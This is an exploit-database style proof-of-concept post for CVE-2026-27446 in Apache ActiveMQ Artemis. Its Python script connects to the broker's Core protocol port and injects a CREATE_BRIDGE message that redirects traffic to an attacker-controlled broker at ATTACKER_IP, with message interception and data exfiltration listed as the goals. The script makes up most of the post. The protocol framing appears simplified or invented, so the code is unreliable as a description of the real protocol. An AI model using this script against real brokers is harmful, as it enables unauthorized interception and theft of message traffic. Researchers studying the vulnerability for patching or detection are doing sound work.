=============================================================================================================================================
| # Title     : Apache ActiveMQ Artemis Unauthorized Bridge Injection via Core Protocol                                                     |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://artemis.apache.org/components/artemis/                                                                              |
=============================================================================================================================================

[+] Summary    : PoC CVE-2026-27446 targeting the Core protocol of Apache ActiveMQ Artemis on its default port 61616.

The code:

Establishes a raw TCP connection to the target broker.

Sends a minimal ARTEMIS handshake to verify Core protocol support.

Attempts to inject a simplified CREATE_BRIDGE control message that redirects traffic to a rogue broker.

If the broker is misconfigured (e.g., security disabled or management permissions improperly restricted), an attacker could potentially create a bridge without authentication, resulting in:

Message interception

Traffic redirection

Data exfiltration

Broker trust abuse

[+] Affected Versions

Apache Artemis: 2.50.0 → 2.51.0

Apache ActiveMQ Artemis: 2.11.0 → 2.44.0

[+] Fixed in: Apache Artemis 2.52.0
			  
[+] POC   :  

import socket
import struct

TARGET_IP = "192.168.1.100"  
TARGET_PORT = 61616           
ATTACKER_IP = "192.168.1.50"  

def create_core_packet(payload):
    """Wraps the data in the Core protocol format (Length + Data)"""
    return struct.pack('>I', len(payload)) + payload

def check_vulnerability():
    try:
        print(f"[*] Connecting to {TARGET_IP}:{TARGET_PORT}...")
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((TARGET_IP, TARGET_PORT))
        handshake = b"ARTEMIS" + struct.pack('>I', 1) 
        sock.send(handshake)
        
        response = sock.recv(1024)
        if b"ARTEMIS" not in response:
            print("[-] Target does not seem to support Artemis Core protocol.")
            return

        print("[+] Handshake successful. Target supports Core protocol.")        
        print(f"[*] Sending malicious Bridge redirection to {ATTACKER_IP}...")
        evil_payload = f"CREATE_BRIDGE;name=exploit;uri=tcp://{ATTACKER_IP}:61616;queue=ANY".encode()
        sock.send(create_core_packet(evil_payload))

        print("[!] Packet sent. Monitor your rogue broker for incoming connections.")
        
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    check_vulnerability()
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================